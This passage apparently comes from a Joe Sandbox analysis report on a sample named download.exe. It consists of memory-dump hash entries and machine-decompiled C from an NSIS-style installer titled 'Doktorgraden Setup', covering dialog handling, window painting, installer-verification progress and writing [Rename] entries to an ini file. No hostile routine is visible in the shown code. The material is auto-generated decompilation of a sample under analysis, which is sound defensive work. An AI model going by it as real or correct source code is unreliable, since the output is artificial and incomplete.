                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd2fa7fa00cc300eb595caf92d99940d954b57604cea41b64526bcc555c64647
                                                      • Instruction ID: 42ce9815886f38228e7cadc49de5f2d1406b9b73cd74c0c441941f026437abb1
                                                      • Opcode Fuzzy Hash: fd2fa7fa00cc300eb595caf92d99940d954b57604cea41b64526bcc555c64647
                                                      • Instruction Fuzzy Hash: 21916973F2E301C9FB932570C5913F55770CF2A293E21CB95B827A1565B62E7A4A36C0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cef73fa0928347f5d1dc7a3e7ef5e8abf286a04701b12dad13d13d252f6a6bf
                                                      • Instruction ID: 91659af2d032e29ebedbea5f5ff13046c633da5fe02d81ea9a25cb6a009f5cf9
                                                      • Opcode Fuzzy Hash: 1cef73fa0928347f5d1dc7a3e7ef5e8abf286a04701b12dad13d13d252f6a6bf
                                                      • Instruction Fuzzy Hash: 3B817973F2E301C9FB932470C5513F55770CF2A693E21CBA5B827A1565B62E7A4A36C0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ec89a5f1394b9d40fb196785391b51e753a0a2be20a359f003ca17973296d8f
                                                      • Instruction ID: 6bdf0294c87d5d281c72bd9a260ef7ce5db3eca374180f4d7cc7b54ab14963ec
                                                      • Opcode Fuzzy Hash: 4ec89a5f1394b9d40fb196785391b51e753a0a2be20a359f003ca17973296d8f
                                                      • Instruction Fuzzy Hash: 4AB15873F2E305C9FB932470C5913F557B0CF2A193E208B95B827A1565BA2E7A4A36C4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 98ab3819823e625aa799170e109083f6b61dfa590064754562d50d1b84ab630c
                                                      • Instruction ID: bde434a010bfce55ddcdd86f5ea9e7a797ceb53ce5c4cd15ffe9ebb993a5b100
                                                      • Opcode Fuzzy Hash: 98ab3819823e625aa799170e109083f6b61dfa590064754562d50d1b84ab630c
                                                      • Instruction Fuzzy Hash: CB917A73F2E301C9FB932470C5813F55B70CF2B593E20CB96B827A1565B62E7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0542bf23a69f70c689509776a3a5786ada27b98f04cc1ef9a5c79abd9b8ec23f
                                                      • Instruction ID: feec9c8b29b546841c435b824ef846cce998bd3a7c327749e4ba19e9281e1dfc
                                                      • Opcode Fuzzy Hash: 0542bf23a69f70c689509776a3a5786ada27b98f04cc1ef9a5c79abd9b8ec23f
                                                      • Instruction Fuzzy Hash: EF818873F2E301C9FB932460C5413F557B0CF2A693E21CB92B827A1565B62F7A4D3680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd

                                                      C-Code - Quality: 93%
                                                      			E00404187(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                      				intOrPtr _v8;
                                                      				signed int _v12;
                                                      				void* _v16;
                                                      				struct HWND__* _t52;
                                                      				intOrPtr _t71;
                                                      				intOrPtr _t85;
                                                      				long _t86;
                                                      				int _t98;
                                                      				struct HWND__* _t99;
                                                      				signed int _t100;
                                                      				intOrPtr _t103;
                                                      				signed int _t106;
                                                      				intOrPtr _t107;
                                                      				intOrPtr _t109;
                                                      				int _t110;
                                                      				signed int* _t112;
                                                      				signed int _t113;
                                                      				char* _t114;
                                                      				CHAR* _t115;
                                                      
                                                      				if(_a8 != 0x110) {
                                                      					__eflags = _a8 - 0x111;
                                                      					if(_a8 != 0x111) {
                                                      						L11:
                                                      						__eflags = _a8 - 0x4e;
                                                      						if(_a8 != 0x4e) {
                                                      							__eflags = _a8 - 0x40b;
                                                      							if(_a8 == 0x40b) {
                                                      								 *0x79e50c =  *0x79e50c + 1;
                                                      								__eflags =  *0x79e50c;
                                                      							}
                                                      							L25:
                                                      							_t110 = _a16;
                                                      							L26:
                                                      							return E00404083(_a8, _a12, _t110);
                                                      						}
                                                      						_t52 = GetDlgItem(_a4, 0x3e8);
                                                      						_t110 = _a16;
                                                      						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                                      						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                                      							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                                      							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                      								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                      								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                      								_v12 = _t100;
                                                      								__eflags = _t100 - _t109 - 0x800;
                                                      								_v16 = _t109;
                                                      								_v8 = 0x7a1ee0;
                                                      								if(_t100 - _t109 < 0x800) {
                                                      									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                      									SetCursor(LoadCursorA(0, 0x7f02));
                                                      									_push(1);
                                                      									E0040442B(_a4, _v8);
                                                      									SetCursor(LoadCursorA(0, 0x7f00));
                                                      									_t110 = _a16;
                                                      								}
                                                      							}
                                                      						}
                                                      						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                                      						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                                      							goto L26;
                                                      						} else {
                                                      							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                                      							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                      								goto L26;
                                                      							}
                                                      							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                      								SendMessageA( *0x7a2f48, 0x111, 1, 0);
                                                      							}
                                                      							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                      								SendMessageA( *0x7a2f48, 0x10, 0, 0);
                                                      							}
                                                      							return 1;
                                                      						}
                                                      					}
                                                      					__eflags = _a12 >> 0x10;
                                                      					if(_a12 >> 0x10 != 0) {
                                                      						goto L25;
                                                      					}
                                                      					__eflags =  *0x79e50c; // 0x0
                                                      					if(__eflags != 0) {
                                                      						goto L25;
                                                      					}
                                                      					_t103 =  *0x79ed18; // 0xae4f0c
                                                      					_t25 = _t103 + 0x14; // 0xae4f20
                                                      					_t112 = _t25;
                                                      					__eflags =  *_t112 & 0x00000020;
                                                      					if(( *_t112 & 0x00000020) == 0) {
                                                      						goto L25;
                                                      					}
                                                      					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                      					__eflags = _t106;
                                                      					 *_t112 = _t106;
                                                      					E0040403E(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                      					E00404407();
                                                      					goto L11;
                                                      				} else {
                                                      					_t98 = _a16;
                                                      					_t113 =  *(_t98 + 0x30);
                                                      					if(_t113 < 0) {
                                                      						_t107 =  *0x7a271c; // 0xaea04d
                                                      						_t113 =  *(_t107 - 4 + _t113 * 4);
                                                      					}
                                                      					_t71 =  *0x7a2f98; // 0xae8c88
                                                      					_push( *((intOrPtr*)(_t98 + 0x34)));
                                                      					_t114 = _t113 + _t71;
                                                      					_push(0x22);
                                                      					_a16 =  *_t114;
                                                      					_v12 = _v12 & 0x00000000;
                                                      					_t115 = _t114 + 1;
                                                      					_v16 = _t115;
                                                      					_v8 = E00404152;
                                                      					E0040401C(_a4);
                                                      					_push( *((intOrPtr*)(_t98 + 0x38)));
                                                      					_push(0x23);
                                                      					E0040401C(_a4);
                                                      					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                      					E0040403E( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                      					_t99 = GetDlgItem(_a4, 0x3e8);
                                                      					E00404051(_t99);
                                                      					SendMessageA(_t99, 0x45b, 1, 0);
                                                      					_t85 =  *0x7a2f54; // 0xae4de0
                                                      					_t20 = _t85 + 0x68; // 0xfffffff1
                                                      					_t86 =  *_t20;
                                                      					if(_t86 < 0) {
                                                      						_t86 = GetSysColor( ~_t86);
                                                      					}
                                                      					SendMessageA(_t99, 0x443, 0, _t86);
                                                      					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                      					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                      					 *0x79e50c = 0;
                                                      					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                      					 *0x79e50c = 0;
                                                      					return 0;
                                                      				}
                                                      			}






















                                                      APIs
                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404212
                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404226
                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404244
                                                      • GetSysColor.USER32(FFFFFFF1), ref: 00404255
                                                      • SendMessageA.USER32(00000000,00000443,00000000,FFFFFFF1), ref: 00404264
                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404273
                                                      • lstrlenA.KERNEL32(?), ref: 00404276
                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404285
                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040429A
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004042FC
                                                      • SendMessageA.USER32(00000000), ref: 004042FF
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040432A
                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040436A
                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00404379
                                                      • SetCursor.USER32(00000000), ref: 00404382
                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404398
                                                      • SetCursor.USER32(00000000), ref: 0040439B
                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043C7
                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                      • String ID: Call$N$RA@
                                                      • API String ID: 3103080414-2992999996
                                                      • Opcode ID: 937b42b3135c4e1aa36ae5a1725e39aac0471f252f69529ff53d1d3c1c1a1b80
                                                      • Instruction ID: 9d4f5b614004455fa0fc48963a53335b2d61895e96ab3f79d0888a2017683c32
                                                      • Opcode Fuzzy Hash: 937b42b3135c4e1aa36ae5a1725e39aac0471f252f69529ff53d1d3c1c1a1b80
                                                      • Instruction Fuzzy Hash: E761C5B1A40205BFEB109F61DD45F6A3B69FB84704F10802AFB05BA2D1C7BCA951CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                      				struct tagLOGBRUSH _v16;
                                                      				struct tagRECT _v32;
                                                      				struct tagPAINTSTRUCT _v96;
                                                      				struct HDC__* _t70;
                                                      				struct HBRUSH__* _t87;
                                                      				struct HFONT__* _t94;
                                                      				long _t102;
                                                      				intOrPtr _t115;
                                                      				signed int _t126;
                                                      				struct HDC__* _t128;
                                                      				intOrPtr _t130;
                                                      
                                                      				if(_a8 == 0xf) {
                                                      					_t130 =  *0x7a2f54; // 0xae4de0
                                                      					_t70 = BeginPaint(_a4,  &_v96);
                                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                      					_a8 = _t70;
                                                      					GetClientRect(_a4,  &_v32);
                                                      					_t126 = _v32.bottom;
                                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                                      					while(_v32.top < _t126) {
                                                      						_a12 = _t126 - _v32.top;
                                                      						asm("cdq");
                                                      						asm("cdq");
                                                      						asm("cdq");
                                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                      						_t87 = CreateBrushIndirect( &_v16);
                                                      						_v32.bottom = _v32.bottom + 4;
                                                      						_a16 = _t87;
                                                      						FillRect(_a8,  &_v32, _t87);
                                                      						DeleteObject(_a16);
                                                      						_v32.top = _v32.top + 4;
                                                      					}
                                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                                      						_t56 = _t130 + 0x34; // 0xae4de0
                                                      						_t94 = CreateFontIndirectA( *_t56);
                                                      						_a16 = _t94;
                                                      						if(_t94 != 0) {
                                                      							_t128 = _a8;
                                                      							_v32.left = 0x10;
                                                      							_v32.top = 8;
                                                      							SetBkMode(_t128, 1);
                                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                                      							_a8 = SelectObject(_t128, _a16);
                                                      							DrawTextA(_t128, "Doktorgraden Setup", 0xffffffff,  &_v32, 0x820);
                                                      							SelectObject(_t128, _a8);
                                                      							DeleteObject(_a16);
                                                      						}
                                                      					}
                                                      					EndPaint(_a4,  &_v96);
                                                      					return 0;
                                                      				}
                                                      				_t102 = _a16;
                                                      				if(_a8 == 0x46) {
                                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                      					_t115 =  *0x7a2f48; // 0x202c0
                                                      					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                                      				}
                                                      				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                      			}














                                                      APIs
                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectA.GDI32(00AE4DE0), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,FFFFFFFF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextA.USER32(00000000,Doktorgraden Setup,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: Doktorgraden Setup$F
                                                      • API String ID: 941294808-1380501420
                                                      • Opcode ID: 5d259313e85fbaf708a0b03883ff4ad94c3fd8dcebbcebd210a7d21844077b3d
                                                      • Instruction ID: 38fadef1db352f82975619da7fddedca022a80716c75150ab5a709db8b4f24fa
                                                      • Opcode Fuzzy Hash: 5d259313e85fbaf708a0b03883ff4ad94c3fd8dcebbcebd210a7d21844077b3d
                                                      • Instruction Fuzzy Hash: CB416C71800249AFCB058F95DE459AFBBB9FF45314F00802EF9A1AA1A0C778DA55DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405BEC(void* __ecx) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				long _t12;
                                                      				intOrPtr _t14;
                                                      				long _t24;
                                                      				char* _t31;
                                                      				int _t37;
                                                      				void* _t38;
                                                      				intOrPtr* _t39;
                                                      				long _t42;
                                                      				CHAR* _t44;
                                                      				void* _t46;
                                                      				void* _t48;
                                                      				void* _t49;
                                                      				void* _t52;
                                                      				void* _t53;
                                                      
                                                      				_t38 = __ecx;
                                                      				_t44 =  *(_t52 + 0x14);
                                                      				 *0x7a12d0 = 0x4c554e;
                                                      				if(_t44 == 0) {
                                                      					L3:
                                                      					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x7a16d0, 0x400);
                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                      						_t37 = wsprintfA(0x7a0ed0, "%s=%s\r\n", 0x7a12d0, 0x7a16d0);
                                                      						_t14 =  *0x7a2f54; // 0xae4de0
                                                      						_t53 = _t52 + 0x10;
                                                      						_t3 = _t14 + 0x128; // 0x13ab
                                                      						E00405F9F(_t37, 0x400, 0x7a16d0, 0x7a16d0,  *_t3);
                                                      						_t12 = E00405B16(0x7a16d0, 0xc0000000, 4);
                                                      						_t48 = _t12;
                                                      						 *(_t53 + 0x18) = _t48;
                                                      						if(_t48 != 0xffffffff) {
                                                      							_t42 = GetFileSize(_t48, 0);
                                                      							_t6 = _t37 + 0xa; // 0xa
                                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                      							if(_t46 == 0 || E00405B8E(_t48, _t46, _t42) == 0) {
                                                      								L18:
                                                      								return CloseHandle(_t48);
                                                      							} else {
                                                      								if(E00405A7B(_t38, _t46, "[Rename]\r\n") != 0) {
                                                      									_t49 = E00405A7B(_t38, _t21 + 0xa, 0x40a3b8);
                                                      									if(_t49 == 0) {
                                                      										_t48 =  *(_t53 + 0x18);
                                                      										L16:
                                                      										_t24 = _t42;
                                                      										L17:
                                                      										E00405AD1(_t24 + _t46, 0x7a0ed0, _t37);
                                                      										SetFilePointer(_t48, 0, 0, 0);
                                                      										E00405BBD(_t48, _t46, _t42 + _t37);
                                                      										GlobalFree(_t46);
                                                      										goto L18;
                                                      									}
                                                      									_t39 = _t46 + _t42;
                                                      									_t31 = _t39 + _t37;
                                                      									while(_t39 > _t49) {
                                                      										 *_t31 =  *_t39;
                                                      										_t31 = _t31 - 1;
                                                      										_t39 = _t39 - 1;
                                                      									}
                                                      									_t24 = _t49 - _t46 + 1;
                                                      									_t48 =  *(_t53 + 0x18);
                                                      									goto L17;
                                                      								}
                                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                      								_t42 = _t42 + 0xa;
                                                      								goto L16;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					CloseHandle(E00405B16(_t44, 0, 1));
                                                      					_t12 = GetShortPathNameA(_t44, 0x7a12d0, 0x400);
                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                      						goto L3;
                                                      					}
                                                      				}
                                                      				return _t12;
                                                      			}

                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D7D,?,?), ref: 00405C1D
                                                      • GetShortPathNameA.KERNEL32(?,007A12D0,00000400), ref: 00405C26
                                                        • Part of subcall function 00405A7B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A8B
                                                        • Part of subcall function 00405A7B: lstrlenA.KERNEL32(00000000,?,00000000,00405CD6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ABD
                                                      • GetShortPathNameA.KERNEL32(?,007A16D0,00000400), ref: 00405C43
                                                      • wsprintfA.USER32 ref: 00405C61
                                                      • GetFileSize.KERNEL32(00000000,00000000,007A16D0,C0000000,00000004,007A16D0,000013AB,?,?,?,?), ref: 00405C9C
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CAB
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE3
                                                      • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED0,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D39
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405D4A
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D51
                                                        • Part of subcall function 00405B16: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405B1A
                                                        • Part of subcall function 00405B16: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                      • String ID: %s=%s$[Rename]
                                                      • API String ID: 2171350718-1727408572
                                                      • Opcode ID: 45160d7d980c9177ced87b727a44c84efcd25dff5150337c1955e55c924b3a17
                                                      • Instruction ID: 022478914a54526cde4d083c9269fc90008e130feab77c5089d91aa4570e4fa5
                                                      • Opcode Fuzzy Hash: 45160d7d980c9177ced87b727a44c84efcd25dff5150337c1955e55c924b3a17
                                                      • Instruction Fuzzy Hash: 6131DF31201B196BD2207B659D4CF6B3A5CDF85794F24053BBA01F62D2EA7CA8058EAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402C7C(struct HWND__* _a4, intOrPtr _a8) {
                                                      				char _v68;
                                                      				int _t11;
                                                      				int _t20;
                                                      
                                                      				if(_a8 == 0x110) {
                                                      					SetTimer(_a4, 1, 0xfa, 0);
                                                      					_a8 = 0x113;
                                                      				}
                                                      				if(_a8 == 0x113) {
                                                      					_t20 =  *0x78a0f4; // 0xa4d3a
                                                      					_t11 =  *0x7960fc; // 0xa6270
                                                      					if(_t20 >= _t11) {
                                                      						_t20 = _t11;
                                                      					}
                                                      					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                      					SetWindowTextA(_a4,  &_v68);
                                                      					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                      				}
                                                      				return 0;
                                                      			}

                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                                      • MulDiv.KERNEL32(000A4D3A,00000064,000A6270), ref: 00402CC2
                                                      • wsprintfA.USER32 ref: 00402CD2
                                                      • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: :M$pb$verifying installer: %d%%
                                                      • API String ID: 1451636040-2400729567
                                                      • Opcode ID: 5bc376e969e12caa47fa3f233e97b7e9205a4f9680dc87fa7bda5c810414eec7
                                                      • Instruction ID: de2615d2472e4fc16c898f89e06f4c65c316d83b10e4b0077f24645c8aa4783b
                                                      • Opcode Fuzzy Hash: 5bc376e969e12caa47fa3f233e97b7e9205a4f9680dc87fa7bda5c810414eec7
                                                      • Instruction Fuzzy Hash: E8014F70540209FBEF249F61DE4AEEE3769EB04304F00803AFA16B92D0DBB989518F59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004061E7(CHAR* _a4) {
                                                      				char _t5;
                                                      				char _t7;
                                                      				char* _t15;
                                                      				char* _t16;
                                                      				CHAR* _t17;
                                                      
                                                      				_t17 = _a4;
                                                      				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                      					_t17 =  &(_t17[4]);
                                                      				}
                                                      				if( *_t17 != 0 && E00405982(_t17) != 0) {
                                                      					_t17 =  &(_t17[2]);
                                                      				}
                                                      				_t5 =  *_t17;
                                                      				_t15 = _t17;
                                                      				_t16 = _t17;
                                                      				if(_t5 != 0) {
                                                      					do {
                                                      						if(_t5 > 0x1f &&  *((char*)(E00405940("*?|<>/\":", _t5))) == 0) {
                                                      							E00405AD1(_t16, _t17, CharNextA(_t17) - _t17);
                                                      							_t16 = CharNextA(_t16);
                                                      						}
                                                      						_t17 = CharNextA(_t17);
                                                      						_t5 =  *_t17;
                                                      					} while (_t5 != 0);
                                                      				}
                                                      				 *_t16 =  *_t16 & 0x00000000;
                                                      				while(1) {
                                                      					_t16 = CharPrevA(_t15, _t16);
                                                      					_t7 =  *_t16;
                                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                      						break;
                                                      					}
                                                      					 *_t16 =  *_t16 & 0x00000000;
                                                      					if(_t15 < _t16) {
                                                      						continue;
                                                      					}
                                                      					break;
                                                      				}
                                                      				return _t7;
                                                      			}









                                                      APIs
                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\download.exe",75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 0040623F
                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040624C
                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\download.exe",75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00406251
                                                      • CharPrevA.USER32(?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00406261
                                                      Strings
                                                      • *?|<>/":, xrefs: 0040622F
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004061E8
                                                      • "C:\Users\user\Desktop\download.exe", xrefs: 00406223
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmp
